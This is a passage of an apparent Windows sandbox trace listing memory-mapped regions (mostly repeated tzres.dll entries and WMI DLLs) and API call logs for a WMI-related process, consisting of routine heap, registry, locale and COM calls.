start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5420
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5421
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5422
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5423
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5424
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5425
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5426
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5427
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5428
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5429
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5430
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5431
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5432
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5433
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5434
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5435
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5436
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5437
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5438
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5439
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5440
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5441
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5442
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5443
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5444
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5445
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5446
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5447
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5448
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5449
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5450
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5451
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5452
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5453
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5454
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5455
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5456
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5457
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5458
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5459
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5460
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5461
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5462
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5463
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5464
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5465
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5466
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5467
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5468
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5469
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5470
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5471
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5472
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5473
start_va = 0x380000
end_va = 0x386fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 6034
start_va = 0x12d0000
end_va = 0x134ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012d0000"
filename = ""
Region:
id = 6062
start_va = 0x7fef4ff0000
end_va = 0x7fef501bfff
monitored = 0
entry_point = 0x7fef5008194
region_type = mapped_file
name = "wmipcima.dll"
filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll")
Region:
id = 6063
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 6064
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 6065
start_va = 0x75830000
end_va = 0x75832fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmi.dll"
filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll")
Region:
id = 6066
start_va = 0x190000
end_va = 0x192fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 6067
start_va = 0x1010000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 6068
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 6069
start_va = 0x1a0000
end_va = 0x1a1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Thread:
id = 249
os_tid = 0x20c
[0563.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xeec18 | out: lpSystemTimeAsFileTime=0xeec18*(dwLowDateTime=0x6a2a26b0, dwHighDateTime=0x1dab599))
[0563.648] GetCurrentProcessId () returned 0x7e4
[0563.648] GetCurrentThreadId () returned 0x20c
[0563.648] GetTickCount () returned 0x25403
[0563.648] GetTickCount () returned 0x25403
[0563.648] QueryPerformanceCounter (in: lpPerformanceCount=0xeec20 | out: lpPerformanceCount=0xeec20*=2095669396789) returned 1
[0563.648] malloc (_Size=0x100) returned 0x3b56a0
[0563.649] GetProcessHeap () returned 0x1c0000
[0563.649] __dllonexit () returned 0x7fefa2a1e40
[0563.649] GetProcessHeap () returned 0x1c0000
[0563.649] __dllonexit () returned 0x7fefa2a1e50
[0563.650] __dllonexit () returned 0x7fefa2a1e70
[0563.650] GetTickCount () returned 0x25403
[0563.650] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x6c
[0563.651] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x77b10000
[0563.651] GetProcAddress (hModule=0x77b10000, lpProcName="RegCreateKeyExW") returned 0x77b1c830
[0563.651] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0xeea08, lpdwDisposition=0xee9a0 | out: phkResult=0xeea08*=0x0, lpdwDisposition=0xee9a0*=0x2) returned 0x5
[0563.653] GetSystemDirectoryW (in: lpBuffer=0x7fefa2c7afc, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0563.653] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\system32\\wbem\\logs")) returned 0x10
[0563.653] GetLastError () returned 0x0
[0563.654] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xeea08, lpdwDisposition=0xee9a0 | out: phkResult=0xeea08*=0x0, lpdwDisposition=0xee9a0*=0x2) returned 0x5
[0563.655] _vsnwprintf (in: _Buffer=0xee970, _BufferCount=0x1d, _Format="%d", _ArgList=0xee958 | out: _Buffer="1") returned 1
[0563.655] _vsnwprintf (in: _Buffer=0xee970, _BufferCount=0x1d, _Format="%d", _ArgList=0xee958 | out: _Buffer="65536") returned 5
[0563.655] __dllonexit () returned 0x7fefa2a1ea0
[0563.656] __dllonexit () returned 0x7fefa2a1ed0
[0563.656] __dllonexit () returned 0x7fefa2a1ef0
[0563.656] __dllonexit () returned 0x7fefa2a1f10
[0563.656] __dllonexit () returned 0x7fefa2a1f30
[0563.657] DisableThreadLibraryCalls (hLibModule=0x7fefa260000) returned 1
[0563.657] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x30) returned 0x1de3d0
[0563.657] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x30) returned 0x1de410
[0563.657] GetVersion () returned 0x1db10106
[0563.657] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c30000
[0563.657] GetProcAddress (hModule=0x77c30000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c70bc0
[0563.657] EtwRegisterTraceGuidsW () returned 0x0
[0563.657] EtwRegisterTraceGuidsW () returned 0x0
[0563.748] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x4) returned 0x1fd910
[0563.828] GetModuleHandleW (lpModuleName="Kernel32") returned 0x77b10000
[0563.828] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0563.828] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="LocaleNameToLCID") returned 0x77b14fa0
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="GetLocaleInfoEx") returned 0x77b135e0
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="LCIDToLocaleName") returned 0x77b18680
[0563.829] GetProcAddress (hModule=0x77b10000, lpProcName="GetSystemDefaultLocaleName") returned 0x77b5bbc0
[0563.829] SetLastError (dwErrCode=0x0)
[0563.829] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xef2a0 | out: pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xef2a0) returned 1
[0563.830] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x18) returned 0x1fd490
[0563.830] SetLastError (dwErrCode=0x0)
[0563.830] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x1fd490, pcchLanguagesBuffer=0xef2a0 | out: pulNumLanguages=0xef3f8, pwszLanguagesBuffer=0x1fd490, pcchLanguagesBuffer=0xef2a0) returned 1
[0563.830] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x18) returned 0x1fd4b0
[0563.830] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409
[0563.830] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409
[0563.831] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd490 | out: hHeap=0x1c0000) returned 1
[0563.846] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegOpenKeyExW") returned 0x77b23a00
[0563.858] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0xee4c8 | out: phkResult=0xee4c8*=0x184) returned 0x0
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegQueryValueExW") returned 0x77b23f00
[0563.858] RegQueryValueExW (in: hKey=0x184, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0xee430, lpData=0xee440, lpcbData=0xee434*=0x19 | out: lpType=0xee430*=0x0, lpData=0xee440*=0xc8, lpcbData=0xee434*=0x19) returned 0x2
[0563.858] GetProcAddress (hModule=0x77b10000, lpProcName="RegCloseKey") returned 0x77b240b0
[0563.858] RegCloseKey (hKey=0x184) returned 0x0
Thread:
id = 250
os_tid = 0x248
Thread:
id = 251
os_tid = 0x24c
Thread:
id = 252
os_tid = 0x250
Thread:
id = 253
os_tid = 0x2b4
[0563.906] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.907] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x8) returned 0x1fd9d0
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x14) returned 0x1fd630
[0563.926] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd9d0 | out: hHeap=0x1c0000) returned 1
[0563.926] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x2c) returned 0x21e640
[0563.927] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fd630 | out: hHeap=0x1c0000) returned 1
[0563.927] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0xc8) returned 0x1f6760
[0563.928] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1f6760 | out: hHeap=0x1c0000) returned 1
[0563.928] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x34) returned 0x21e680
[0563.928] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e680 | out: hHeap=0x1c0000) returned 1
[0563.928] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x80) returned 0x2137c0
[0563.929] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x21e640 | out: hHeap=0x1c0000) returned 1
[0563.933] memcpy (in: _Dst=0xcee418, _Src=0x22361c, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.934] memcpy (in: _Dst=0xcee418, _Src=0x222f29, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.934] memcpy (in: _Dst=0xcee418, _Src=0x223624, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.935] memcpy (in: _Dst=0xcee418, _Src=0x222f2f, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.935] memcpy (in: _Dst=0xcee418, _Src=0x222f31, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260a9, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260ab, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260ad, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.957] memcpy (in: _Dst=0xcee418, _Src=0x2260af, _Size=0x2 | out: _Dst=0xcee418) returned 0xcee418
[0563.958] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x219a90
[0563.958] SafeArrayGetElemsize (psa=0x21e990) returned 0x8
[0563.958] memcpy (in: _Dst=0xcee200, _Src=0xcee128, _Size=0x8 | out: _Dst=0xcee200) returned 0xcee200
[0563.959] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x219a90 | out: hHeap=0x1c0000) returned 1
[0563.959] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1fa570 | out: hHeap=0x1c0000) returned 1
[0563.960] memcpy (in: _Dst=0xcee418, _Src=0x225a6e, _Size=0x4 | out: _Dst=0xcee418) returned 0xcee418
[0563.982] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcec4d0 | out: lpSystemTimeAsFileTime=0xcec4d0*(dwLowDateTime=0x6a5e84f0, dwHighDateTime=0x1dab599))
[0563.982] GetCurrentProcessId () returned 0x7e4
[0563.982] GetCurrentThreadId () returned 0x2b4
[0563.982] GetTickCount () returned 0x2555a
[0563.982] RtlQueryPerformanceCounter (in: lpPerformanceCount=0xcec4d8 | out: lpPerformanceCount=0xcec4d8*=2095702797152) returned 1
[0563.982] malloc (_Size=0x100) returned 0x3d17d0
[0563.982] malloc (_Size=0x30) returned 0x3cfea0
[0563.983] __dllonexit () returned 0x7fef4b89f70
[0563.983] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
[0563.983] __dllonexit () returned 0x7fef4b89f84
[0563.983] malloc (_Size=0x18) returned 0x3be750
[0563.983] __dllonexit () returned 0x7fef4b8a0a4
[0563.984] __dllonexit () returned 0x7fef4b8a0b8
[0563.984] __dllonexit () returned 0x7fef4b8a0ec
[0563.984] __dllonexit () returned 0x7fef4b8a120
[0563.985] __dllonexit () returned 0x7fef4b8a154
[0563.985] malloc (_Size=0x60) returned 0x3bf2d0
[0563.985] malloc (_Size=0x18) returned 0x3bed10
[0563.985] malloc (_Size=0x18) returned 0x3be1c0
[0563.985] __dllonexit () returned 0x7fef4b8a188
[0563.985] __dllonexit () returned 0x7fef4b8a194
[0563.986] __dllonexit () returned 0x7fef4b8a1c8
[0563.986] __dllonexit () returned 0x7fef4b8a1fc
[0563.986] __dllonexit () returned 0x7fef4b8a240
[0563.986] __dllonexit () returned 0x7fef4b8a254
[0563.988] __dllonexit () returned 0x7fef4b8a268
[0563.988] __dllonexit () returned 0x7fef4b8a2ac
[0563.988] __dllonexit () returned 0x7fef4b8a2e0
[0563.988] __dllonexit () returned 0x7fef4b8a2f4
[0563.989] __dllonexit () returned 0x7fef4b8a328
[0563.989] __dllonexit () returned 0x7fef4b8a35c
[0563.989] __dllonexit () returned 0x7fef4b8a390
[0563.990] __dllonexit () returned 0x7fef4b8a3c4
[0563.990] __dllonexit () returned 0x7fef4b8a3f8
[0563.992] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7feff780000
[0563.992] GetProcAddress (hModule=0x7feff780000, lpProcName="StringFromGUID2") returned 0x7feff7a3560
[0563.992] StringFromGUID2 (in: rguid=0x7fef4b9f270*(Data1=0x8ecc055d, Data2=0x47f, Data3=0x11d1, Data4=([0]=0xa5, [1]=0x37, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x75, [6]=0x3e, [7]=0xd1)), lpsz=0x3de1ec, cchMax=128 | out: lpsz="{8ECC055D-047F-11D1-A537-0000F8753ED1}") returned 39
[0563.992] __dllonexit () returned 0x7fef4b8a42c
[0563.992] __dllonexit () returned 0x7fef4b8a4b0
[0563.993] __dllonexit () returned 0x7fef4b8a4f0
[0563.993] __dllonexit () returned 0x7fef4b8a524
[0563.993] __dllonexit () returned 0x7fef4b8a558
[0563.994] __dllonexit () returned 0x7fef4b8a58c
